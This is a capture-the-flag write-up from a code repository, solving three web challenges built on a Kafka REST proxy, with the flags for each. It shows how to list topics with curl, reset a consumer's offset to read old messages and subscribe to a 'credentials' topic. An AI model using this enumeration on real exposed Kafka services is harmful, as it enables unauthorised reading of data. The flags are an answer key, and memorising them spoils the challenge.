ig-ctf-solutions/write-ups-challenges-2023-2024
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
main
write-ups-challenges-2023-2024/serious_business/SOLUTION.md
rdegreef 7e677ee86c intitial commit
2023-11-28 16:24:59 +01:00

2.9 KiB
Raw Permalink Blame History

Metamorphosis solutions

Category

Web

Serious Business 1

Difficulty

Easy, 20 points

Flag

IGCTF{challenge_1_did_you_write_them_all_down!?}

Solution

Every message sent on the topic that the first website listens to contains the flag. This can just be viewed in the network tab of the in-browser debugger. Look for any request labeled records. The flag is in the object in the value field.

Challenge 2

Difficulty

Above average, 50 points

Flag

IGCTF{challenge2_in_case_it_wasnt_clear_I_dont_like_meetings}

Solution

Applying the solution from challenge 1 will just yield "flag already sent". This implies that we need to look at previously sent messages to get the flag. But let's take a step back first? Where are these messages coming from?

The script that runs shows the creation and usage of some kind of consumer. If we look closely at the content-type, we can see application/vnd.kafka.v2+json. In other words, we are somehow interacting with Kafka. Kafka itself doesn't have a REST API though, which is what gets used here. A bit of googling should land you on the kafka-rest proxy. https://docs.confluent.io/platform/current/kafka-rest/index.html

After learning a bit about Kafka and the REST proxy, we should be able to figure out how to adapt the existing code to read out all messages of a topic. To do so, we need to create a Kafka consumer that reads out all records from the topic from the beginning (i.e., from the first offset). In the makeConsoomer function, defined in script.js, we can see the following configuration:

let config = {
    name: uuid,
    format: "json",
    "auto.offset.reset": "latest",
}

We need to change the auto.offset.reset field to earliest to properly configure the consumer to read out all records on the topic (this sets the consumer offsets to the beginning of the topic).

Challenge 3

Difficulty

Above average, 60 points

Flag

IGCTF{challenge_3_I_forgot_to_take_my_meds}

Solution

There is no mention of a flag in the messages consumed by the third website. We'll need to dig around the Kafka cluster a bit more to find this one. We get an interesting result when we list all topics in the cluster:

curl <IP>:38082/topics
# ["__confluent.support.metrics","_schemas","credentials","great.ideas","oh.no","stand.back"]

There is a topic called credentials here, which seems rather interesting. We need a consumer to subscribe to this topic. In the website's code this is done as follows:

async function subscribe(c) {
    return post(c + "/subscription", {
        topics: [TOPIC]
    })
}

If we add the credentials topic to that list, and call subscribe, we should also get records back from that topic. However, the flag was only published once, so just like with the previous flag, we need to reconfigure our consumer to start reading the topic from the earliest offset.